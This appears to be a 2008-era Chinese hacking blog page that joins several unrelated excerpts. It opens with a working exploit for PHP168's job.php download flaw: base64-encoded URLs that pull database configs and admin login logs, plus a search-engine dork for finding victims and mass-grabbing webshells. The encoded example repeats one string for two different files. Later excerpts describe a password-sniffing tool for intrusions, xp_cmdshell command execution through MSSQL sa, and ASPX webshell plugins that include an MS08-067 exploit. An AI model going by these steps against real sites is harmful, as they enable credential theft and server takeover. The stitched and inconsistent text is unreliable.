首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。
下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
程序后台:http://dabei.org/admin/index.php?iframe=1
Base64加密代码:
http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)
http://dabei.org//php168 /mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)
批量抓webshell:google,baidu 输入关键字:Powered by PHP168
from:http://www.hack58.net/Article/html/3/62/2008/20875.htm
这本是下个版本里的help()函数功能,现在单独拿出来做一个速查手册。
个别API包括在下一个版本中。
Anehta core API Help: …
产品官方:世界之窗浏览器是一款小巧、快速、安全、功能强大的多窗口浏览器,它是完 全免费,没有任何功能限制的绿色软件。世界之窗浏览器兼容微软IE浏览器,可运行于微软windows98/ME/2000/XP/Vista系列操作系 统上,它使用IE浏览器相同的内核,因此网页显示效果可以与IE浏览器完全相同,推荐您同时安装IE6.0版或者更高的版本。世界之窗浏览器由凤凰工作室 出品,它完全免费,没有任何功能限制,不捆绑任何第三方软件,可以干净卸载,请您放心使用。不同于常见的其它IE内核浏览器,世界之窗浏览器使用C++和 Win32 SDK开发,自行针对浏览器开发进行了代码库的封装,具有更扁平更透明的封装特性,功能实现的方法更加灵活快速;世界之窗2.0版本在积累了1.x系列版 本的长期开发经验基础上,所有程序架构代码全部重写、所有浏览增强功能代码全部重写以追求更完美更优秀的软件品质。厂商地址为 http://www.ioage.com/。
漏洞来源:http://www.80sec.com
漏洞说明:80sec在其产品世界之窗浏览器和360安全浏览器中发现了一个严重的安全问题,由于浏览器在处理某些伪协议时存在安全问题,导致恶意站点可 以实现地址栏欺骗,用户可能在毫无知觉的情况下被引导进去一个钓鱼或者欺骗页面,该页面的地址栏是完全正确的地址,内容却可以被随意构造。
漏洞证明:80sec将在厂商修补该问题之后提供漏洞证明代码,请关注http://www.80sec.com/
漏洞状态:80sec已经及时与厂商取得沟通,厂商将于近期发布补丁。
漏洞建议:建议用户及时关注厂商提供的补丁,在此期间浏览站点的时候不要随便点击不明站点提供的链接,避免遭受损失。
本站内容均为原创,转载请务必保留署名与链接! 世界之窗(The World)浏览器地址栏欺骗漏洞警告:http://www.80sec.com/the-world-browser-security-aler.html
微软“黑屏”未平息,安全漏洞又袭来。与前者不同的是,微软系统此次爆出的今年最大安全漏洞(KB958644),影响的不仅仅是用户体验,更授“黑客”以柄——利用此漏洞发动大规模远程攻击,危害效果与“冲击波”“震荡波”等病毒类似。
10月21日零时,微软启动盗版验证计划,开启自动更新的部分盗版用户体验到了“黑屏”一刻。之后第三天,10月24日凌晨,微软即紧急发布了 一项重要的安全更新(KB958644),涉及Win-dows2000/XP/Vista等桌面操作系统的绝大多数版本。其危害程度毫不逊于当年波及 80%以上Windows用户的“冲击波”病毒。
微软公告称,黑客可以利用该漏洞向网络中的电脑发出远程特制RPC请求,无需身份验证便可在电脑中任意执行远程代码。这就是说,即便你的电脑设置了管理员密码,也只能任由黑客摆布。
截至目前,网上已出现了利用该漏洞的蠕虫病毒(Win32/MS08067.gen!A)。据网络安全专家分析,这一漏洞的危害极为严重,黑客 仅根据IP地址便可随意发起攻击,可谓“指哪打哪”,而且感染性极强。只要远程执行一段下载恶意程序的代码,不但能随意弹出广告、盗取用户账号,还可以控 制本机进而攻击其他用户,使破坏力持续放大。
虽然,微软已经发布了该漏洞的安全补丁,但由于近期“黑屏”事件的影响,很多用户关闭了系统的补丁自动更新功能,因此很可能造成严重的危害。专家提醒用户,应尽快安装上所有补丁。
新闻来源:驱动之家 随着Web 2.0的发展,互联网的互动性已经越来越强,不过据IT安全公司Radware安全运营中心主管Itzik Kotler的警告。JavaScript可能会成为新的黑客攻击点。 Kotler除了为Radware扫描软件开发新的签名和分析工具之外,也在寻找新类别的安全漏洞。据他发现,使用JavaScript中的一个安全漏洞,可以使黑客从客户电脑拷贝走文件而不容易被检测到。 < 在本周伦敦进行的RSA安全会议上,Kotler演示了这种黑客方法,他同时展示了如何通过在浏览器中执行HTML代码来检测防病毒软件的存在。 Kotler表示,这种新的攻击方法因为以下两种优势将吸引网络罪犯,一、这种方法不容易被检测,二、可以跨平台跨浏览器。
他得出的结论是,虽然这种攻击方法尚未被黑客采用,不过浏览器厂商和安全公司必须确保浏览器在更加灵活的同时不给黑客打开后门。
作者:cnqing
PS:应邀写了篇帮助
Websniff 1.0 是user权限的 rawsocket sniff,可以截取ftp,http,smtp …等密码,在渗透过程中绝对实用的工具。cncert网站发布的websniff需要 .net 2.0,客户端用firefox,如果用IE会让你错过一个参数设置。
先看下截图
bindip: 有多个IP的情况下,选择要监听的IP地址。只有一个IP,就不用选了。 filterport: 要监听的端口,只能同时监听一个,该参数匹配源地址或目的地址。 MiniSizeToCapture: 要捕获的数据包大小最小长度,例:设为40 那么只抓长度大于40的数据包。 KeyWordsFilter:要包含的关键字,例:设为"passwd " 在符合上面条件的数据包进一步过滤包含"passwd"的数据包,1.0版本不支持多关键字。 Logfile:捕获的数据包文件存放位置,必须为一个可写目录。…
下午在公司已经可以在 Windows Server 2008 和 IIS 7 下跑 PHP 了,家里是 Windows Server 2003 和 IIS 6 的,虽然之前也可以跑过 PHP,但觉得过程糊里糊涂,不知所以然,google 一翻,终于实现手工配置 IIS…
By:刺
有心的朋友可能已经注意到了,Anehta 中实现了一个客户端Cache。
位置在core里面: anehta.core.cache = function(){}
在core中我预定义了一个变量,可以让我们很方便的操作cache:
// 初始化一个cache出来共享数据 var anehtaCache = new anehta.core.cache();
在写模块的时候,直接使用 anehtaCache这个变量就可以了。
那么我们为什么要用cache? 它是做什么的?
cache的思想最初来源于一个jQuery 的插件:…
转载请注明来源:BK瞬间群 首发Web安全手册
//////////////////////////////////////////////////////////////////////// sa执行命令方法总结
By 无敌小黄瓜 ////////////////////////////////////////////////////////////////////////
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
一.xp_cmdshell
EXEC master..xp_cmdshell ‘ipconfig’
开启xp_cmdshell:
– To allow advanced options…
作者:cnqing
ASPXshell MS08-067插件 感谢hi群众兄测试,附赠几个插件。。。 1.扫可写目录插件 使用方法:设置扫描起始目录,设置扫描成功N个后停止,扫描。
2.无组件打包插件 使用方法:设置要打包的目录,设置打包到的位置,不建议打包很大的文件(1G?)。下载到本地用点击“解压”工具解压。 3.MS-08067 for CN 插件 下载地址:http://www.cncert.net/up_files/soft/20081028_plugs.rar 原始客户端:http://www.cncert.net/DOWN/script/2008-10-13/167.html 更新方法: 将*.dll放到根目录 将*.dll2放到remoter目录
重新启动程序